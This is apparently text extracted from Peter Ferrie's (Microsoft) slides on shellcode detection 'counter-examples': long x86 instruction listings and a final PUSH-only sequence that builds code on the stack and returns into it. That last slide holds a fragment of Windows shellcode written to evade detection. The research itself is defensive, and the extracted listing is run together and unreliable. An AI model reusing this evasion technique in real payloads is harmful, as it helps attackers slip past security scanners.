SUB ESI, 85F2652B81 E0 1D 2F FE 42 AND EAX, 42FE2F1D 81 D3 82 DF 6A 4C ADC EBX, 4C6ADF8281 C4 B6 B7 63 11 ADD ESP, 1163B7B6 81 DD 12 EB 79 09 SBB EBP, 0979EB1281 E2 4C 1F C6 49 AND EDX, 49C61F4C 81 EF 44 55 30 6F SUB EDI, 6F30554481 E6 51 06 20 81 AND ESI, 81200651 81 EB 38 97 73 C3 SUB EBX, C373973881 C3 89 3E 92 B0 ADD EBX, B0923E89 81 C2 E5 B9 A4 64 ADD EDX, 64A4B9E581 C2 3F D4 0B 03 ADD EDX, 030BD43F 81 E9 0F 5A 2D BD SUB ECX, BD2D5A0F81 F1 83 58 77 42 XOR ECX, 42775883 81 FC 4C 3D C1 ED CMP ESP, EDC13D4C81 F2 E1 8F 77 97 XOR EDX, 97778FE1 81 C8 3F D5 80 85 OR EAX, 8580D53F81 C3 DF 20 B0 54 ADD EBX, 54B020DF 81 F2 C1 7A 9D D5 XOR EDX, D59D7AC181 E6 CB 3D A2 16 AND ESI, 16A23DCB 81 D8 30 31 36 BA SBB EAX, BA36313081 D6 85 42 83 D8 ADC ESI, D8834285 81 E9 8B B5 A7 70 SUB ECX, 70A7B58B81 DB 5A D9 4F EB SBB EBX, EB4FD95A 81 EB FE 18 53 D7 SUB EBX, D75318FE81 DD C2 B7 09 91 SBB EBP, 9109B7C2 81 FC 80 1E 0E C0 CMP ESP, C00E1E8081 FB 75 F4 88 D2 CMP EBX, D288F475 81 F2 26 6E 68 DC XOR EDX, DC686E2681 CE 48 3F 36 A6 OR ESI, A6363F48 81 D4 86 20 A2 F0 ADC ESP, F0A2208681 FF D5 D7 0B 66 CMP EDI, 660BD7D5 81 CD 4C EA 4D 70 OR EBP, 704DEA4C 47 Peter Ferrie, Microsoft Corporation

  48. Counter-examples 81 FA D9 09 9B A9 CMP EDX, A99B09D9 81 C5 F6 8C 77 9C ADD EBP, 9C778CF681 E4 FF FF FF FF AND ESP, FFFFFFFF 81 EC 0D 18 C8 B6 SUB ESP, B6C8180D81 ED 05 D3 76 F8 SUB EBP, F876D305 81 F2 6D C7 EE 78 XOR EDX, 78EEC76D81 CA 2A 10 0E 4C OR EDX, 4C0E102A 81 CD 41 B7 EC 27 OR EBP, 27ECB74181 EC 3C D8 05 02 SUB ESP, 0205D83C 81 D9 16 7A 0E 5A SBB ECX, 5A0E7A1681 E2 1D EF 2A AF AND EDX, AF2AEF1D 81 E6 50 9E 00 5E AND ESI, 5E009E5081 F7 C3 2C C8 A4 XOR EDI, A4C82CC3 81 F4 E3 FE F0 87 XOR ESP, 87F0FEE381 D0 37 B2 2A FB ADC EAX, FB2AB237 81 DE D5 11 F1 1D SBB ESI, 1DF111D581 CB BC E0 1F CD OR EBX, CD1FE0BC 81 CC 00 00 00 00 OR ESP, 0000000081 EC BB C8 83 15 SUB ESP, 1583C8BB 81 CF E3 15 96 51 OR EDI, 519615E381 CD 5A 70 F9 44 OR EBP, 44F9705A 81 EA 50 74 2B A2 SUB EDX, A22B745081 E4 FF FF FF FF AND ESP, FFFFFFFF 81 EB 84 89 4C BB SUB EBX, BB4C898481 F9 DF 8A EA BF CMP ECX, BFEA8ADF 81 E9 78 C9 3B D0 SUB ECX, D03BC97881 F3 77 8D 12 C5 XOR EBX, C5128D77 81 F7 62 1D 08 67 XOR EDI, 67081D6281 E6 64 F1 B2 05 AND ESI, 05B2F164 81 C9 B1 5E E8 08 OR ECX, 08E85EB181 CF 60 9C A7 9D OR EDI, 9DA79C60 81 CC 00 00 00 00 OR ESP, 0000000081 C6 DD 2B 20 0A ADD ESI, 0A202BDD 81 CE D3 91 D2 A2 OR ESI, A2D291D381 C2 48 31 B4 07 ADD EDX, 07B43148 81 E1 86 2F D4 36 AND ECX, 36D42F8681 C9 9A 8B F3 3A OR ECX, 3AF38B9A 81 F7 C1 39 A5 9A XOR EDI, 9AA539C181 D4 04 8A 6D CE ADC ESP, CE6D8A04 81 FA 3C 98 76 83 CMP EDX, 8376983C81 C1 BF CD 13 BB ADD ECX, BB13CDBF 81 F8 DF 52 17 AA CMP EAX, AA1752DF81 E1 B9 B4 7A A1 AND ECX, A17AB4B9 81 F5 09 98 F6 8D XOR EBP, 8DF6980981 DA 56 DF 8F 05 SBB EDX, 058FDF56 81 EB 14 EB CD 68 SUB EBX, 68CDEB1481 EC 49 C1 E9 B8 SUB ESP, B8E9C149 81 E9 B2 37 73 E9 SUB ECX, E97337B281 EE F2 B4 E0 B7 SUB ESI, B7E0B4F2 81 EF D9 6C 2C 1D SUB EDI, 1D2C6CD981 F3 45 3B 3A AB XOR EBX, AB3A3B45 81 FD BA 39 9F 27 CMP EBP, 279F39BA81 EC F3 E7 37 49 SUB ESP, 4937E7F3 81 C1 5B 7C 2C B9 ADD ECX, B92C7C5B81 FA CF A2 C4 F9 CMP EDX, F9C4A2CF 81 CB DE 6C 76 47 OR EBX, 47766CDE81 C8 39 87 0D A8 OR EAX, A80D8739 81 FF B6 D5 A7 B5 CMP EDI, B5A7D5B681 ED F1 3C 6D E2 SUB EBP, E26D3CF1 81 D1 7D 85 D2 5E ADC ECX, 5ED2857D81 CA 6C 8C FB 00 OR EDX, 00FB8C6C 81 F9 AB 59 17 5B CMP ECX, 5B1759AB81 DF 96 39 EB 66 SBB EDI, 66EB3996 81 F5 1B 27 BD 2D XOR EBP, 2DBD271B 48 Peter Ferrie, Microsoft Corporation

  49. Counter-examples 81 FF 96 73 BB 56 CMP EDI, 56BB7396 81 E0 8C 44 41 7F AND EAX, 7F41448C81 F4 E3 FE F0 87 XOR ESP, 87F0FEE3 81 E7 03 B9 19 50 AND EDI, 5019B90381 DD 72 80 9A BF SBB EBP, BF9A8072 81 F2 5F A1 33 E3 XOR EDX, E333A15F81 F2 98 CE 9A FB XOR EDX, FB9ACE98 81 ED CE 5C 5A B9 SUB EBP, B95A5CCE81 E2 12 82 04 EA AND EDX, EA048212 81 C2 D0 36 C5 73 ADD EDX, 73C536D081 C4 FE 64 A3 DA ADD ESP, DAA364FE 81 EE B3 FE 60 4A SUB ESI, 4A60FEB381 C9 5F EF 0E 73 OR ECX, 730EEF5F 81 CF 5D 8D 4C 3D OR EDI, 3D4C8D5D81 FF D2 1E 39 CD CMP EDI, CD391ED2 81 CC 00 00 00 00 OR ESP, 0000000081 F0 2E C2 6B A4 XOR EAX, A46BC22E 81 C4 02 9B 5C 25 ADD ESP, 255C9B0281 E3 3E 4C DC 39 AND EBX, 39DC4C3E 81 C9 48 DC CE 49 OR ECX, 49CEDC4881 E7 C6 4F 19 AF AND EDI, AF194FC6 81 D4 37 B0 B1 16 ADC ESP, 16B1B03781 CD 0B 59 A8 64 OR EBP, 64A8590B 81 CF 0D 5D 77 A1 OR EDI, A1775D0D81 C0 4A C1 C0 41 ADD EAX, 41C0C14A 81 F8 A0 20 F9 1B CMP EAX, 1BF920A081 EE BE 7A 4D 6C SUB ESI, 6C4D7ABE 81 C4 05 AF FF 4D ADD ESP, 4DFFAF0581 D9 21 E2 FF B5 SBB ECX, B5FFE221 81 FB 45 51 7E 7D CMP EBX, 7D7E514581 CF 0F 5C 8A 0C OR EDI, 0C8A5C0F 81 ED 93 15 1F 0A SUB EBP, 0A1F159381 DD 42 27 58 88 SBB EBP, 88582742 81 F9 D7 18 B0 2F CMP ECX, 2FB018D781 E1 D8 5C BB 55 AND ECX, 55BB5CD8 81 FB 98 F8 5C 47 CMP EBX, 475CF89881 E4 FF FF FF FF AND ESP, FFFFFFFF 81 E0 05 5A AD 79 AND EAX, 79AD5A0581 CB FA 6F 95 3D OR EBX, 3D956FFA 81 C7 00 C0 73 DB ADD EDI, DB73C00081 D0 52 C5 6E 4A ADC EAX, 4A6EC552 81 E0 5B 88 31 D4 AND EAX, D431885B81 F3 57 58 F7 E1 XOR EBX, E1F75857 81 FD DA 99 6E 4E CMP EBP, 4E6E99DA81 D6 64 4C 29 3B ADC ESI, 3B294C64 81 E3 C4 5D 8D EB AND EBX, EB8D5DC481 FF AA BD 2B D1 CMP EDI, D12BBDAA 81 E2 D7 A1 57 B0 AND EDX, B057A1D781 E3 1B AA D1 28 AND EBX, 28D1AA1B 81 CA 46 ED 29 34 OR EDX, 3429ED4681 C3 4E 88 8D AC ADD EBX, AC8D884E 81 F8 CB A2 DC 9B CMP EAX, 9BDCA2CB81 E1 11 E9 21 90 AND ECX, 9021E911 81 DE D3 8B F3 61 SBB ESI, 61F38BD381 DE 1E AD 23 9C SBB ESI, 9C23AD1E 81 EF 78 B3 09 5E SUB EDI, 5E09B37881 DE 82 42 30 02 SBB ESI, 02304282 81 CF 74 C4 51 A9 OR EDI, A951C47481 D7 12 F8 FE 13 ADC EDI, 13FEF812 81 C6 AD E5 29 79 ADD ESI, 7929E5AD81 FD DA A3 C4 3A CMP EBP, 3AC4A3DA 81 E3 43 36 DB 79 AND EBX, 79DB364381 FD B4 8E 4F 6E CMP EBP, 6E4F8EB4 81 E6 28 48 5A 96 AND ESI, 965A4828 49 Peter Ferrie, Microsoft Corporation

  50. Counter-examples No reads from memory Store absolute values 68 00 56 FF D7 PUSH D7FF560068 00 8B F4 6A PUSH 6AF48B0068 68 63 6D 64 PUSH 646D636868 F7 03 3C AE PUSH AE3C03F768 74 3E 1C 03 PUSH 031C3E7468 45 75 F3 8B PUSH 8BF3754568 3A 57 69 6E PUSH 6E69573A68 14 AB 81 3C PUSH 3C81AB1468 33 ED 45 8B PUSH 8B45ED3368 3E 20 03 DF PUSH DF03203E68 3E 78 8B 5C PUSH 5C8B783E68 77 3C 8B 74 PUSH 748B3C7768 8B 78 08 8B PUSH 8B08788B68 8B 77 1C AD PUSH AD1C778B68 00 8B 78 0C PUSH 0C788B0068 64 67 A1 30 PUSH 30A1676454 PUSH ESPC3 RET 50 Peter Ferrie, Microsoft Corporation

More Related